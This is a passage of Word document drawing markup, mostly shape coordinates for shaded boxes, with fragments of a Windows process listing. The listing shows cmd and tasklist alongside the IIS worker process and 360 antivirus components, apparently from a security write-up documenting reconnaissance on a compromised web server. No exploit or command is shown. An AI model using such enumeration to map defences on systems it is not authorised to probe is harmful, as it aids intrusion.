,10935e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:545.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10910" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:10910;width:8990;height:370" coordorigin="1490,10910" coordsize="8990,370" path="m1510,10935l1510,10935,1510,10935,1510,10935,1510,10935,1510,10935,1510,10935,1511,10935,1512,10935,1512,10935,1514,10935,1515,10935,1517,10935,1519,10935,1521,10935,1524,10935,1528,10935,1532,10935,1536,10935,1541,10935,1546,10935,1552,10935,1559,10935,1566,10935,1575,10935,1583,10935,1593,10935,1603,10935,1615,10935,1627,10935,1640,10935,1654,10935,1668,10935,1684,10935,1701,10935,1719,10935,1738,10935,1758,10935,1780,10935,1802,10935,1826,10935,1851,10935,1877,10935,1904,10935,1933,10935,1963,10935,1995,10935,2028,10935,2063,10935,2099,10935,2136,10935,2175,10935,2216,10935,2259,10935,2303,10935,2348,10935,2396,10935,2445,10935,2496,10935,2549,10935,2604,10935,2660,10935,2719,10935,2779,10935,2841,10935,2906,10935,2972,10935,3041,10935,3112,10935,3184,10935,3259,10935,3336,10935,3416,10935,3498,10935,3582,10935,3668,10935,3757,10935,3848,10935,3941,10935,4037,10935,4136,10935,4236,10935,4340,10935,4446,10935,4555,10935,4666,10935,4780,10935,4897,10935,5017,10935,5139,10935,5264,10935,5392,10935,5523,10935,5657,10935,5793,10935,5933,10935,6076,10935,6222,10935,6370,10935,6522,10935,6677,10935,6835,10935,6997,10935,7161,10935,7329,10935,7500,10935,7675,10935,7853,10935,8034,10935,8219,10935,8407,10935,8598,10935,8793,10935,8992,10935,9194,10935,9400,10935,9609,10935,9823,10935,10039,10935,10260,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10935,10484,10936,10484,10936,10484,10936,10484,10936,10484,10936,10484,10937,10484,10937,10484,10937,10484,10938,10484,10938,10484,10939,10484,10939,10484,10940,10484,10940,10484,10941,10484,10941,10484,10942,10484,10943,10484,10943,10484,10944,10484,10945,10484,10946,10484,10947,10484,10948,10484,10949,10484,10950,10484,10951,10484,10952,10484,10953,10484,10954,10484,10956,10484,10957,10484,10959,10484,10960,10484,10962,10484,10963,10484,10965,10484,10967,10484,10969,10484,10970,10484,10972,10484,10974,10484,10977,10484,10979,10484,10981,10484,10983,10484,10986,10484,10988,10484,10991,10484,10993,10484,10996,10484,10999,10484,11002,10484,11005,10484,11008,10484,11011,10484,11014,10484,11018,10484,11021,10484,11024,10484,11028,10484,11032,10484,11035,10484,11039,10484,11043,10484,11047,10484,11052,10484,11056,10484,11060,10484,11065,10484,11069,10484,11074,10484,11079,10484,11084,10484,11089,10484,11094,10484,11099,10484,11105,10484,11110,10484,11116,10484,11121,10484,11127,10484,11133,10484,11139,10484,11146,10484,11152,10484,11158,10484,11165,10484,11172,10484,11178,10484,11185,10484,11193,10484,11200,10484,11207,10484,11215,10484,11222,10484,11230,10484,11238,10484,11246,10484,11254,10484,11263,10484,11271,10484,11280,10484,11280,10484,11280,10484,11280,10484,11280,10484,11280,10484,11280,10483,11280,10482,11280,10482,11280,10480,11280,10479,11280,10477,11280,10475,11280,10473,11280,10470,11280,10466,11280,10462,11280,10458,11280,10453,11280,10448,11280,10442,11280,10435,11280,10428,11280,10419,11280,10411,11280,10401,11280,10391,11280,10379,11280,10367,11280,10354,11280,10340,11280,10326,11280,10310,11280,10293,11280,10275,11280,10256,11280,10236,11280,10215,11280,10192,11280,10168,11280,10143,11280,10117,11280,10090,11280,10061,11280,10031,11280,9999,11280,9966,11280,9931,11280,9895,11280,9858,11280,9819,11280,9778,11280,9735,11280,9691,11280,9646,11280,9598,11280,9549,11280,9498,11280,9445,11280,9391,11280,9334,11280,9275,11280,9215,11280,9153,11280,9088,11280,9022,11280,8953,11280,8883,11280,8810,11280,8735,11280,8658,11280,8578,11280,8497,11280,8413,11280,8326,11280,8238,11280,8146,11280,8053,11280,7957,11280,7859,11280,7758,11280,7654,11280,7548,11280,7439,11280,7328,11280,7214,11280,7097,11280,6977,11280,6855,11280,6730,11280,6602,11280,6471,11280,6337,11280,6201,11280,6061,11280,5918,11280,5773,11280,5624,11280,5472,11280,5317,11280,5159,11280,4997,11280,4833,11280,4665,11280,4494,11280,4319,11280,4141,11280,3960,11280,3776,11280,3587,11280,3396,11280,3201,11280,3002,11280,2800,11280,2594,11280,2385,11280,2172,11280,1955,11280,1734,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11280,1510,11279,1510,11279,1510,11279,1510,11279,1510,11279,1510,11279,1510,11279,1510,11279,1510,11278,1510,11278,1510,11278,1510,11278,1510,11278,1510,11277,1510,11277,1510,11276,1510,11276,1510,11276,1510,11275,1510,11275,1510,11274,1510,11274,1510,11273,1510,11272,1510,11272,1510,11271,1510,11270,1510,11269,1510,11268,1510,11268,1510,11267,1510,11266,1510,11265,1510,11263,1510,11262,1510,11261,1510,11260,1510,11258,1510,11257,1510,11256,1510,11254,1510,11253,1510,11251,1510,11249,1510,11247,1510,11246,1510,11244,1510,11242,1510,11240,1510,11238,1510,11235,1510,11233,1510,11231,1510,11228,1510,11226,1510,11223,1510,11221,1510,11218,1510,11215,1510,11212,1510,11209,1510,11206,1510,11203,1510,11200,1510,11197,1510,11193,1510,11190,1510,11186,1510,11182,1510,11179,1510,11175,1510,11171,1510,11167,1510,11163,1510,11158,1510,11154,1510,11149,1510,11145,1510,11140,1510,11135,1510,11130,1510,11125,1510,11120,1510,11115,1510,11110,1510,11104,1510,11098,1510,11093,1510,11087,1510,11081,1510,11075,1510,11069,1510,11062,1510,11056,1510,11049,1510,11043,1510,11036,1510,11029,1510,11022,1510,11014,1510,11007,1510,11000,1510,10992,1510,10984,1510,10976,1510,10968,1510,10960,1510,10952,1510,10943,1510,10935e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:545.400pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-1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VGAuthService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1216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360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vmtoolsd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1300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068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ManagementAgentHost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1332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844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1368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884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WmiPrvSE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1768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016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dllhost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1848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224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msdtc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1940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736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WmiPrvSE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1440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19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768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mscorsvw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296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732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mscorsvw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584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088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sppsvc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1476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408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taskhost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2612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344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dwm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2868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604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explorer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2896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912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vmtoolsd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3008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744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TrustedInstaller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2268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15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776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360Tray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2684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056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360sd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2636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316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49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ZhuDongFangYu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2456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292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360rp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1712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27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072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SoftMgrLite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864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816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w3wp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3300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42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836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3840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584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notepad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3712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772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55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cmd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3384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2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376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conhost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3520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420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K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650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57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tasklist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3096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5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276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K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58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600.27pt;width:0.0pt;height:241.972pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,12000" coordsize="0,4839">
        <v:shape style="position:absolute;left:10402;top:12000;width:0;height:4839" coordorigin="10402,12000" coordsize="0,4839" path="m10402,12000l10402,12000,10402,12000,10402,12000,10402,12000,10402,12000,10402,12000,10402,12001,10402,12001,10402,12002,10402,12002,10402,12003,10402,12004,10402,12005,10402,12006,10402,12008,10402,12010,10402,12012,10402,12014,10402,12017,10402,12020,10402,12023,10402,12027,10402,12031,10402,12035,10402,12040,10402,12045,10402,12051,10402,12057,10402,12063,10402,12070,10402,12078,10402,12086,10402,12094,10402,12103,10402,12113,10402,12123,10402,12134,10402,12146,10402,12158,10402,12170,10402,12184,10402,12198,10402,12213,10402,12228,10402,12245,10402,12262,10402,12280,10402,12298,10402,12318,10402,12338,10402,12359,10402,12381,10402,12404,10402,12428,10402,12452,10402,12478,10402,12504,10402,12532,10402,12560,10402,12590,10402,12620,10402,12652,10402,12684,10402,12718,10402,12753,10402,12789,10402,12826,10402,12864,10402,12903,10402,12943,10402,12985,10402,13028,10402,13072,10402,13117,10402,13164,10402,13212,10402,13261,10402,13311,10402,13363,10402,13416,10402,13470,10402,13526,10402,13583,10402,13642,10402,13702,10402,13764,10402,13827,10402,13891,10402,13957,10402,14025,10402,14094,10402,14164,10402,14236,10402,14310,10402,14385,10402,14462,10402,14541,10402,14621,10402,14703,10402,14787,10402,14872,10402,14959,10402,15048,10402,15138,10402,15230,10402,15325,10402,15420,10402,15518,10402,15618,10402,15719,10402,15822,10402,15928,10402,16035,10402,16144,10402,16255,10402,16368,10402,16483,10402,16600,10402,16719,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:599.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:11990;width:8990;height:390" coordorigin="1490,11990" coordsize="8990,390" path="m1510,12000l1510,12000,1510,12000,1510,12000,1510,12000,1510,12000,1510,12000,1511,12000,1512,12000,1512,12000,1514,12000,1515,12000,1517,12000,1519,12000,1521,12000,1524,12000,1528,12000,1532,12000,1536,12000,1541,12000,1546,12000,1552,12000,1559,12000,1566,12000,1575,12000,1583,12000,1593,12000,1603,12000,1615,12000,1627,12000,1640,12000,1654,12000,1668,12000,1684,12000,1701,12000,1719,12000,1738,12000,1758,12000,1780,12000,1802,12000,1826,12000,1851,12000,1877,12000,1904,12000,1933,12000,1963,12000,1995,12000,2028,12000,2063,12000,2099,12000,2136,12000,2175,12000,2216,12000,2259,12000,2303,12000,2348,12000,2396,12000,2445,12000,2496,12000,2549,12000,2604,12000,2660,12000,2719,12000,2779,12000,2841,12000,2906,12000,2972,12000,3041,12000,3112,12000,3184,12000,3259,12000,3336,12000,3416,12000,3498,12000,3582,12000,3668,12000,3757,12000,3848,12000,3941,12000,4037,12000,4136,12000,4236,12000,4340,12000,4446,12000,4555,12000,4666,12000,4780,12000,4897,12000,5017,12000,5139,12000,5264,12000,5392,12000,5523,12000,5657,12000,5793,12000,5933,12000,6076,12000,6222,12000,6370,12000,6522,12000,6677,12000,6835,12000,6997,12000,7161,12000,7329,12000,7500,12000,7675,12000,7853,12000,8034,12000,8219,12000,8407,12000,8598,12000,8793,12000,8992,12000,9194,12000,9400,12000,9609,12000,9823,12000,10039,12000,10260,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12000,10484,12001,10484,12001,10484,12001,10484,12001,10484,12001,10484,12001,10484,12002,10484,12002,10484,12002,10484,12003,10484,12003,10484,12003,10484,12004,10484,12004,10484,12005,10484,12005,10484,12006,10484,12006,10484,12007,10484,12008,10484,12008,10484,12009,10484,12010,10484,12011,10484,12012,10484,12013,10484,12014,10484,12015,10484,12016,10484,12017,10484,12018,10484,12020,10484,12021,10484,12023,10484,12024,10484,12026,10484,12027,10484,12029,10484,12031,10484,12033,10484,12035,10484,12037,10484,12039,10484,12041,10484,12043,10484,12045,10484,12048,10484,12050,10484,12053,10484,12055,10484,12058,10484,12061,10484,12064,10484,12067,10484,12070,10484,12073,10484,12076,10484,12079,10484,12083,10484,12086,10484,12090,10484,12094,10484,12098,10484,12102,10484,12106,10484,12110,10484,12114,10484,12119,10484,12123,10484,12128,10484,12132,10484,12137,10484,12142,10484,12147,10484,12153,10484,12158,10484,12163,10484,12169,10484,12175,10484,12180,10484,12186,10484,12192,10484,12199,10484,12205,10484,12211,10484,12218,10484,12225,10484,12232,10484,12239,10484,12246,10484,12253,10484,12261,10484,12268,10484,12276,10484,12284,10484,12292,10484,12300,10484,12308,10484,12317,10484,12325,10484,12334,10484,12343,10484,12352,10484,12361,10484,12371,10484,12380,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10483,12390,10482,12390,10482,12390,10480,12390,10479,12390,10477,12390,10475,12390,10473,12390,10470,12390,10466,12390,10462,12390,10458,12390,10453,12390,10448,12390,10442,12390,10435,12390,10428,12390,10419,12390,10411,12390,10401,12390,10391,12390,10379,12390,10367,12390,10354,12390,10340,12390,10326,12390,10310,12390,10293,12390,10275,12390,10256,12390,10236,12390,10215,12390,10192,12390,10168,12390,10143,12390,10117,12390,10090,12390,10061,12390,10031,12390,9999,12390,9966,12390,9931,12390,9895,12390,9858,12390,9819,12390,9778,12390,9735,12390,9691,12390,9646,12390,9598,12390,9549,12390,9498,12390,9445,12390,9391,12390,9334,12390,9275,12390,9215,12390,9153,12390,9088,12390,9022,12390,8953,12390,8883,12390,8810,12390,8735,12390,8658,12390,8578,12390,8497,12390,8413,12390,8326,12390,8238,12390,8146,12390,8053,12390,7957,12390,7859,12390,7758,12390,7654,12390,7548,12390,7439,12390,7328,12390,7214,12390,7097,12390,6977,12390,6855,12390,6730,12390,6602,12390,6471,12390,6337,12390,6201,12390,6061,12390,5918,12390,5773,12390,5624,12390,5472,12390,5317,12390,5159,12390,4997,12390,4833,12390,4665,12390,4494,12390,4319,12390,4141,12390,3960,12390,3776,12390,3587,12390,3396,12390,3201,12390,3002,12390,2800,12390,2594,12390,2385,12390,2172,12390,1955,12390,1734,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12389,1510,12389,1510,12389,1510,12389,1510,12389,1510,12388,1510,12388,1510,12388,1510,12387,1510,12387,1510,12387,1510,12386,1510,12386,1510,12385,1510,12385,1510,12384,1510,12383,1510,12383,1510,12382,1510,12381,1510,12380,1510,12379,1510,12379,1510,12378,1510,12377,1510,12375,1510,12374,1510,12373,1510,12372,1510,12371,1510,12369,1510,12368,1510,12366,1510,12365,1510,12363,1510,12361,1510,12360,1510,12358,1510,12356,1510,12354,1510,12352,1510,12350,1510,12347,1510,12345,1510,12343,1510,12340,1510,12338,1510,12335,1510,12332,1510,12330,1510,12327,1510,12324,1510,12321,1510,12317,1510,12314,1510,12311,1510,12307,1510,12304,1510,12300,1510,12296,1510,12293,1510,12289,1510,12285,1510,12280,1510,12276,1510,12272,1510,12267,1510,12263,1510,12258,1510,12253,1510,12248,1510,12243,1510,12238,1510,12232,1510,12227,1510,12221,1510,12216,1510,12210,1510,12204,1510,12198,1510,12192,1510,12185,1510,12179,1510,12172,1510,12166,1510,12159,1510,12152,1510,12145,1510,12137,1510,12130,1510,12122,1510,12114,1510,12107,1510,12099,1510,12090,1510,12082,1510,12074,1510,12065,1510,12056,1510,12047,1510,12038,1510,12029,1510,12019,1510,12010,1510,12000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:599.400pt;width:445.800pt;height:19.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:618.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12370" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:12370;width:8990;height:370" coordorigin="1490,12370" coordsize="8990,370" path="m1510,12390l1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1510,12390,1511,12390,1512,12390,1512,12390,1514,12390,1515,12390,1517,12390,1519,12390,1521,12390,1524,12390,1528,12390,1532,12390,1536,12390,1541,12390,1546,12390,1552,12390,1559,12390,1566,12390,1575,12390,1583,12390,1593,12390,1603,12390,1615,12390,1627,12390,1640,12390,1654,12390,1668,12390,1684,12390,1701,12390,1719,12390,1738,12390,1758,12390,1780,12390,1802,12390,1826,12390,1851,12390,1877,12390,1904,12390,1933,12390,1963,12390,1995,12390,2028,12390,2063,12390,2099,12390,2136,12390,2175,12390,2216,12390,2259,12390,2303,12390,2348,12390,2396,12390,2445,12390,2496,12390,2549,12390,2604,12390,2660,12390,2719,12390,2779,12390,2841,12390,2906,12390,2972,12390,3041,12390,3112,12390,3184,12390,3259,12390,3336,12390,3416,12390,3498,12390,3582,12390,3668,12390,3757,12390,3848,12390,3941,12390,4037,12390,4136,12390,4236,12390,4340,12390,4446,12390,4555,12390,4666,12390,4780,12390,4897,12390,5017,12390,5139,12390,5264,12390,5392,12390,5523,12390,5657,12390,5793,12390,5933,12390,6076,12390,6222,12390,6370,12390,6522,12390,6677,12390,6835,12390,6997,12390,7161,12390,7329,12390,7500,12390,7675,12390,7853,12390,8034,12390,8219,12390,8407,12390,8598,12390,8793,12390,8992,12390,9194,12390,9400,12390,9609,12390,9823,12390,10039,12390,10260,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12390,10484,12391,10484,12391,10484,12391,10484,12391,10484,12391,10484,12391,10484,12391,10484,12391,10484,12392,10484,12392,10484,12392,10484,12393,10484,12393,10484,12393,10484,12394,10484,12394,10484,12394,10484,12395,10484,12395,10484,12396,10484,12397,10484,12397,10484,12398,10484,12399,10484,12399,10484,12400,10484,12401,10484,12402,10484,12403,10484,12404,10484,12405,10484,12406,10484,12407,10484,12408,10484,12410,10484,12411,10484,12412,10484,12414,10484,12415,10484,12417,10484,12419,10484,12420,10484,12422,10484,12424,10484,12426,10484,12428,10484,12430,10484,12432,10484,12434,10484,12436,10484,12439,10484,12441,10484,12444,10484,12446,10484,12449,10484,12452,10484,12455,10484,12457,10484,12460,10484,12464,10484,12467,10484,12470,10484,12473,10484,12477,10484,12480,10484,12484,10484,12488,10484,12492,10484,12496,10484,12500,10484,12504,10484,12508,10484,12512,10484,12517,10484,12522,10484,12526,10484,12531,10484,12536,10484,12541,10484,12546,10484,12551,10484,12557,10484,12562,10484,12568,10484,12573,10484,12579,10484,12585,10484,12591,10484,12598,10484,12604,10484,12610,10484,12617,10484,12624,10484,12631,10484,12638,10484,12645,10484,12652,10484,12659,10484,12667,10484,12675,10484,12683,10484,12691,10484,12699,10484,12707,10484,12715,10484,12724,10484,12733,10484,12741,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10483,12750,10482,12750,10482,12750,10480,12750,10479,12750,10477,12750,10475,12750,10473,12750,10470,12750,10466,12750,10462,12750,10458,12750,10453,12750,10448,12750,10442,12750,10435,12750,10428,12750,10419,12750,10411,12750,10401,12750,10391,12750,10379,12750,10367,12750,10354,12750,10340,12750,10326,12750,10310,12750,10293,12750,10275,12750,10256,12750,10236,12750,10215,12750,10192,12750,10168,12750,10143,12750,10117,12750,10090,12750,10061,12750,10031,12750,9999,12750,9966,12750,9931,12750,9895,12750,9858,12750,9819,12750,9778,12750,9735,12750,9691,12750,9646,12750,9598,12750,9549,12750,9498,12750,9445,12750,9391,12750,9334,12750,9275,12750,9215,12750,9153,12750,9088,12750,9022,12750,8953,12750,8883,12750,8810,12750,8735,12750,8658,12750,8578,12750,8497,12750,8413,12750,8326,12750,8238,12750,8146,12750,8053,12750,7957,12750,7859,12750,7758,12750,7654,12750,7548,12750,7439,12750,7328,12750,7214,12750,7097,12750,6977,12750,6855,12750,6730,12750,6602,12750,6471,12750,6337,12750,6201,12750,6061,12750,5918,12750,5773,12750,5624,12750,5472,12750,5317,12750,5159,12750,4997,12750,4833,12750,4665,12750,4494,12750,4319,12750,4141,12750,3960,12750,3776,12750,3587,12750,3396,12750,3201,12750,3002,12750,2800,12750,2594,12750,2385,12750,2172,12750,1955,12750,1734,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12749,1510,12749,1510,12749,1510,12749,1510,12748,1510,12748,1510,12748,1510,12747,1510,12747,1510,12747,1510,12746,1510,12746,1510,12745,1510,12745,1510,12744,1510,12743,1510,12743,1510,12742,1510,12741,1510,12740,1510,12740,1510,12739,1510,12738,1510,12737,1510,12736,1510,12735,1510,12733,1510,12732,1510,12731,1510,12730,1510,12728,1510,12727,1510,12725,1510,12724,1510,12722,1510,12720,1510,12719,1510,12717,1510,12715,1510,12713,1510,12711,1510,12709,1510,12707,1510,12704,1510,12702,1510,12699,1510,12697,1510,12694,1510,12692,1510,12689,1510,12686,1510,12683,1510,12680,1510,12677,1510,12674,1510,12671,1510,12667,1510,12664,1510,12660,1510,12657,1510,12653,1510,12649,1510,12645,1510,12641,1510,12637,1510,12633,1510,12628,1510,12624,1510,12619,1510,12614,1510,12610,1510,12605,1510,12600,1510,12595,1510,12589,1510,12584,1510,12579,1510,12573,1510,12567,1510,12561,1510,12555,1510,12549,1510,12543,1510,12537,1510,12530,1510,12524,1510,12517,1510,12510,1510,12503,1510,12496,1510,12489,1510,12481,1510,12474,1510,12466,1510,12458,1510,12450,1510,12442,1510,12434,1510,12425,1510,12417,1510,12408,1510,12399,1510,12390e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:618.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12370" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:12370;width:30;height:370" coordorigin="1490,12370" coordsize="30,370" path="m1517,12390l1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12390,1517,12391,1517,12391,1517,12391,1517,12391,1517,12391,1517,12391,1517,12391,1517,12391,1517,12392,1517,12392,1517,12392,1517,12393,1517,12393,1517,12393,1517,12394,1517,12394,1517,12394,1517,12395,1517,12395,1517,12396,1517,12397,1517,12397,1517,12398,1517,12399,1517,12399,1517,12400,1517,12401,1517,12402,1517,12403,1517,12404,1517,12405,1517,12406,1517,12407,1517,12408,1517,12410,1517,12411,1517,12412,1517,12414,1517,12415,1517,12417,1517,12419,1517,12420,1517,12422,1517,12424,1517,12426,1517,12428,1517,12430,1517,12432,1517,12434,1517,12436,1517,12439,1517,12441,1517,12444,1517,12446,1517,12449,1517,12452,1517,12455,1517,12457,1517,12460,1517,12464,1517,12467,1517,12470,1517,12473,1517,12477,1517,12480,1517,12484,1517,12488,1517,12492,1517,12496,1517,12500,1517,12504,1517,12508,1517,12512,1517,12517,1517,12522,1517,12526,1517,12531,1517,12536,1517,12541,1517,12546,1517,12551,1517,12557,1517,12562,1517,12568,1517,12573,1517,12579,1517,12585,1517,12591,1517,12598,1517,12604,1517,12610,1517,12617,1517,12624,1517,12631,1517,12638,1517,12645,1517,12652,1517,12659,1517,12667,1517,12675,1517,12683,1517,12691,1517,12699,1517,12707,1517,12715,1517,12724,1517,12733,1517,12741,1517,12750e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:636.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12730" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:12730;width:8990;height:390" coordorigin="1490,12730" coordsize="8990,390" path="m1510,12750l1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1510,12750,1511,12750,1512,12750,1512,12750,1514,12750,1515,12750,1517,12750,1519,12750,1521,12750,1524,12750,1528,12750,1532,12750,1536,12750,1541,12750,1546,12750,1552,12750,1559,12750,1566,12750,1575,12750,1583,12750,1593,12750,1603,12750,1615,12750,1627,12750,1640,12750,1654,12750,1668,12750,1684,12750,1701,12750,1719,12750,1738,12750,1758,12750,1780,12750,1802,12750,1826,12750,1851,12750,1877,12750,1904,12750,1933,12750,1963,12750,1995,12750,2028,12750,2063,12750,2099,12750,2136,12750,2175,12750,2216,12750,2259,12750,2303,12750,2348,12750,2396,12750,2445,12750,2496,12750,2549,12750,2604,12750,2660,12750,2719,12750,2779,12750,2841,12750,2906,12750,2972,12750,3041,12750,3112,12750,3184,12750,3259,12750,3336,12750,3416,12750,3498,12750,3582,12750,3668,12750,3757,12750,3848,12750,3941,12750,4037,12750,4136,12750,4236,12750,4340,12750,4446,12750,4555,12750,4666,12750,4780,12750,4897,12750,5017,12750,5139,12750,5264,12750,5392,12750,5523,12750,5657,12750,5793,12750,5933,12750,6076,12750,6222,12750,6370,12750,6522,12750,6677,12750,6835,12750,6997,12750,7161,12750,7329,12750,7500,12750,7675,12750,7853,12750,8034,12750,8219,12750,8407,12750,8598,12750,8793,12750,8992,12750,9194,12750,9400,12750,9609,12750,9823,12750,10039,12750,10260,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12750,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12751,10484,12752,10484,12752,10484,12752,10484,12752,10484,12752,10484,12753,10484,12753,10484,12754,10484,12754,10484,12754,10484,12755,10484,12755,10484,12756,10484,12756,10484,12757,10484,12758,10484,12758,10484,12759,10484,12760,10484,12761,10484,12762,10484,12763,10484,12764,10484,12765,10484,12766,10484,12767,10484,12768,10484,12769,10484,12771,10484,12772,10484,12774,10484,12775,10484,12777,10484,12778,10484,12780,10484,12782,10484,12784,10484,12785,10484,12787,10484,12790,10484,12792,10484,12794,10484,12796,10484,12799,10484,12801,10484,12803,10484,12806,10484,12809,10484,12812,10484,12814,10484,12817,10484,12820,10484,12824,10484,12827,10484,12830,10484,12834,10484,12837,10484,12841,10484,12844,10484,12848,10484,12852,10484,12856,10484,12860,10484,12864,10484,12869,10484,12873,10484,12878,10484,12882,10484,12887,10484,12892,10484,12897,10484,12902,10484,12907,10484,12913,10484,12918,10484,12924,10484,12930,10484,12935,10484,12941,10484,12947,10484,12954,10484,12960,10484,12966,10484,12973,10484,12980,10484,12987,10484,12994,10484,13001,10484,13008,10484,13016,10484,13023,10484,13031,10484,13039,10484,13047,10484,13055,10484,13063,10484,13072,10484,13080,10484,13089,10484,13098,10484,13107,10484,13116,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10484,13126,10483,13126,10482,13126,10482,13126,10480,13126,10479,13126,10477,13126,10475,13126,10473,13126,10470,13126,10466,13126,10462,13126,10458,13126,10453,13126,10448,13126,10442,13126,10435,13126,10428,13126,10419,13126,10411,13126,10401,13126,10391,13126,10379,13126,10367,13126,10354,13126,10340,13126,10326,13126,10310,13126,10293,13126,10275,13126,10256,13126,10236,13126,10215,13126,10192,13126,10168,13126,10143,13126,10117,13126,10090,13126,10061,13126,10031,13126,9999,13126,9966,13126,9931,13126,9895,13126,9858,13126,9819,13126,9778,13126,9735,13126,9691,13126,9646,13126,9598,13126,9549,13126,9498,13126,9445,13126,9391,13126,9334,13126,9275,13126,9215,13126,9153,13126,9088,13126,9022,13126,8953,13126,8883,13126,8810,13126,8735,13126,8658,13126,8578,13126,8497,13126,8413,13126,8326,13126,8238,13126,8146,13126,8053,13126,7957,13126,7859,13126,7758,13126,7654,13126,7548,13126,7439,13126,7328,13126,7214,13126,7097,13126,6977,13126,6855,13126,6730,13126,6602,13126,6471,13126,6337,13126,6201,13126,6061,13126,5918,13126,5773,13126,5624,13126,5472,13126,5317,13126,5159,13126,4997,13126,4833,13126,4665,13126,4494,13126,4319,13126,4141,13126,3960,13126,3776,13126,3587,13126,3396,13126,3201,13126,3002,13126,2800,13126,2594,13126,2385,13126,2172,13126,1955,13126,1734,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13126,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13124,1510,13124,1510,13124,1510,13124,1510,13123,1510,13123,1510,13123,1510,13122,1510,13122,1510,13121,1510,13121,1510,13120,1510,13120,1510,13119,1510,13118,1510,13118,1510,13117,1510,13116,1510,13115,1510,13114,1510,13113,1510,13112,1510,13111,1510,13110,1510,13109,1510,13108,1510,13107,1510,13105,1510,13104,1510,13102,1510,13101,1510,13099,1510,13098,1510,13096,1510,13094,1510,13092,1510,13091,1510,13089,1510,13087,1510,13084,1510,13082,1510,13080,1510,13078,1510,13075,1510,13073,1510,13070,1510,13067,1510,13064,1510,13062,1510,13059,1510,13056,1510,13052,1510,13049,1510,13046,1510,13043,1510,13039,1510,13035,1510,13032,1510,13028,1510,13024,1510,13020,1510,13016,1510,13012,1510,13007,1510,13003,1510,12998,1510,12994,1510,12989,1510,12984,1510,12979,1510,12974,1510,12969,1510,12963,1510,12958,1510,12952,1510,12947,1510,12941,1510,12935,1510,12929,1510,12922,1510,12916,1510,12910,1510,12903,1510,12896,1510,12889,1510,12882,1510,12875,1510,12868,1510,12860,1510,12853,1510,12845,1510,12837,1510,12829,1510,12821,1510,12813,1510,12804,1510,12796,1510,12787,1510,12778,1510,12769,1510,12760,1510,12750e x" 